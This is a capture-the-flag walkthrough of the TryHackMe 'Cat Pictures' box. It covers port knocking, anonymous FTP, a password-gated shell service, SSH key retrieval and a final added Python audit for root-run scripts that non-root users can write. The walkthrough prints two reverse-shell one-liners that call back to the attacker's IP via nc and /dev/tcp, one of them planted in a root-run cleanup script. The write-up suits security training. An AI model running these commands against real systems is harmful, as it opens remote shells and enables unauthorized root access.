Cat Pictures - TryHackMe


Cat Pictures

I made a forum where you can post cute cat pictures!

Enumeration

Let’s run an nmap scan and see what we get.

# Nmap 7.91 scan initiated Sat Jun  5 16:54:16 2021 as: nmap -sV -sC -oN nmap/scan 10.10.137.255
Nmap scan report for 10.10.137.255
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
8080/tcp open  ssl/http-proxy?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun  5 16:55:55 2021 -- 1 IP address (1 host up) scanned in 98.59 seconds

Looks like we have a website on port 8080.

Let’s poke around a little. After some time I found a hint about what to do; it was in the “Your first forum” post.

Let’s knock on the server. I used knock.py to send the knock sequence; it’s a simple script from this repo:

https://github.com/grongor/knock

You can execute the script with this command:

./knock 10.10.64.47 1111 2222 3333 4444

Now that we have knocked the ports, let’s run the nmap scan again and see what comes back.

# Nmap 7.91 scan initiated Sun Jun  6 15:47:29 2021 as: nmap -sC -sV -A -oN nmap/after_the_knock 10.10.64.47
Nmap scan report for 10.10.64.47
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           162 Apr 02 14:32 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.2.48
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
8080/tcp open  http    Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun  6 15:48:02 2021 -- 1 IP address (1 host up) scanned in 33.45 seconds

We now have an FTP server that allows anonymous login, and inside it a note.txt. Let’s see what it says.

In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is *******.
- catlover

We have a password and port 4420. Let’s look into port 4420.

┌─[][visith@parrot][~/CTF/thm/cat_pictures]
└──╼ $nc -v 10.10.64.47 4420
10.10.64.47: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.64.47] 4420 (?) open
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
******
Password accepted
ls
bin
etc
home
lib
lib64
opt
tmp
usr

We got a shell, but as the banner says we can’t use cd to look around. Now what do we do?!

Thanks to pentestmonkey we have a reverse shell one-liner.

This was my reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.2.48 4444 >/tmp/f

Set up a netcat listener, paste that into the internal shell service and BOOM!!! we get a shell. Here we can use the cd command.

┌─[][visith@parrot][~/CTF/thm/cat_pictures]
└──╼ $nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.9.2.48] from (UNKNOWN) [10.10.64.47] 55986
/bin/sh: 0: can't access tty; job control turned off
# /bin/bash -i
bash: cannot set terminal process group (1589): Inappropriate ioctl for device
bash: no job control in this shell
I have no name!@cat-pictures:/# ls -la
ls -la
total 56
drwxr-xr-x 10 1001 1001 4096 Apr  3 01:30 .
drwxr-xr-x 10 1001 1001 4096 Apr  3 01:30 ..
-rw-------  1 1001 1001   50 Apr  1 20:23 .bash_history
-rw-r--r--  1 1001 1001  220 Apr  1 20:21 .bash_logout
-rw-r--r--  1 1001 1001 3771 Apr  1 20:21 .bashrc
-rw-r--r--  1 1001 1001  807 Apr  1 20:21 .profile
drwxrwxr-x  2 1001 1001 4096 Apr  2 23:05 bin
drwxr-xr-x  2    0    0 4096 Apr  1 20:32 etc
drwxr-xr-x  3    0    0 4096 Apr  2 20:51 home
drwxr-xr-x  3    0    0 4096 Apr  2 22:53 lib
drwxr-xr-x  2    0    0 4096 Apr  1 20:28 lib64
drwxr-xr-x  2    0    0 4096 Apr  2 20:56 opt
drwxr-xr-x  2    0    0 4096 Jun  6 10:58 tmp
drwxr-xr-x  4    0    0 4096 Apr  2 22:43 usr
I have no name!@cat-pictures:/home# ls         
ls
catlover
I have no name!@cat-pictures:/home# cd catlover
cd catlover
I have no name!@cat-pictures:/home/catlover# ls -la
ls -la
total 28
drwxr-xr-x 2 0 0  4096 Apr  3 01:34 .
drwxr-xr-x 3 0 0  4096 Apr  2 20:51 ..
-rwxr-xr-x 1 0 0 18856 Apr  3 01:35 runme

When we look into that runme file we get mostly nonsense, but among it my cat eyes caught this:

rbeccaPlease enter your password: Welcome, catlover! SSH key transfer queued! touch /tmp/gibmethesshkeyAccess Deniedd

Maybe rebecca is the password. Who knows, we can try it.

I have no name!@cat-pictures:/home/catlover# ./runme
./runme
Please enter your password: rebecca
Welcome, catlover! SSH key transfer queued! 
I have no name!@cat-pictures:/home/catlover# ls -la
ls -la
total 32
drwxr-xr-x 2 0 0  4096 Jun  6 11:06 .
drwxr-xr-x 3 0 0  4096 Apr  2 20:51 ..
-rw-r--r-- 1 0 0  1675 Jun  6 11:06 id_rsa
-rwxr-xr-x 1 0 0 18856 Apr  3 01:35 runme
I have no name!@cat-pictures:/home/catlover# 

BOOM! rebecca was the password and we get a private key. If you don’t see it, go back to the previous directory, come back and check again; it will be there.

Let’s fix the permissions on the SSH key and connect over SSH.

┌─[visith@parrot][~/CTF/thm/cat_pictures]
└──╼ $sudo chmod 600 id_rsa 
[sudo] password for visith: 
┌─[visith@parrot][~/CTF/thm/cat_pictures]
└──╼ $ssh catlover@10.10.64.47 -i id_rsa 
The authenticity of host '10.10.64.47 (10.10.64.47)' can't be established.
ECDSA key fingerprint is SHA256:7HBac/JH7EKQik9kL1l9GMjCgLN/69gfXalu5cbPi4U.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

root@7546fa2336d6:/# 
root@7546fa2336d6:/# ls
bin  boot  etc   lib    media  opt      post-init.sh  root  sbin  sys  usr
bitnami  dev   home  lib64  mnt    post-init.d  proc          run   srv   tmp  var
root@7546fa2336d6:/# cd root
root@7546fa2336d6:/root# ls
flag.txt
root@7546fa2336d6:/root# cat flag.txt
*******

After wasting some time, I ran linpeas to make sure I hadn’t missed anything. It showed a “/opt/clean” mount that was exactly the same as the “overlay” filesystem.

Let’s hop into “/opt/clean”. There was a “clean.sh” script in there that wipes the “/tmp” directory completely.

Let’s overwrite it with a reverse shell and set up an nc listener. This was my reverse shell:

echo "bash -i >& /dev/tcp/10.9.2.48/9999 0>&1" > clean.sh

We got a callback on our listener.

┌─[][visith@parrot][~/CTF/thm/cat_pictures]
└──╼ $nc -lnvp 9999
listening on [any] 9999 ...
connect to [10.9.2.48] from (UNKNOWN) [10.10.64.47] 51398
bash: cannot set terminal process group (2590): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# ls
ls
firewall
root.txt
root@cat-pictures:~# cat root.txt
cat root.txt
Congrats!!!
Here is your flag:
******
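The privilege escalation above works because a script that root runs (/opt/clean/clean.sh, on a mount the container shares with the host, which is why the callback lands on cat-pictures instead of the container) could be overwritten by a non-root user. As an added example, not part of the original writeup, here is a small Python audit that flags that kind of script; the demo() directory tree and the file names in it are constructed.

```python
from __future__ import annotations
import os
import stat
import sys
import tempfile
from pathlib import Path

def writable_by_non_root(path: Path) -> list[str]:
    """Reasons a non-root user could change what runs from `path`."""
    st = path.lstat()
    reasons = []
    if stat.S_ISLNK(st.st_mode):
        reasons.append("is a symlink (target can be swapped)")
    if st.st_uid != 0:
        reasons.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append(f"group-writable by gid {st.st_gid}")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons

def audit_scripts(paths) -> dict[str, list[str]]:
    """Check each script and its parent directory; return {path: reasons}."""
    findings: dict[str, list[str]] = {}
    for p in (Path(x) for x in paths):
        reasons = writable_by_non_root(p)
        pst = p.parent.lstat()
        # A world-writable parent without the sticky bit lets anyone delete
        # and recreate the script even when the file itself is 0644.
        if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
            reasons.append("parent dir is world-writable without sticky bit")
        if reasons:
            findings[str(p)] = reasons
    return findings

def demo() -> dict[str, list[str]]:
    """Constructed sample tree: a 0777 clean.sh next to a 0755 safe.sh."""
    d = Path(tempfile.mkdtemp())
    bad, ok = d / "clean.sh", d / "safe.sh"
    bad.write_text("#!/bin/sh\nrm -rf /tmp/*\n")
    ok.write_text("#!/bin/sh\necho ok\n")
    os.chmod(bad, 0o777)
    os.chmod(ok, 0o755)
    return audit_scripts([bad, ok])

if __name__ == "__main__":
    # No arguments: run the constructed sample. Otherwise audit the given
    # paths, e.g. /opt/clean/clean.sh from this box.
    result = audit_scripts(sys.argv[1:]) if len(sys.argv) > 1 else demo()
    for path, why in result.items():
        print(path, "->", "; ".join(why))
```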

Thanks for reading!!
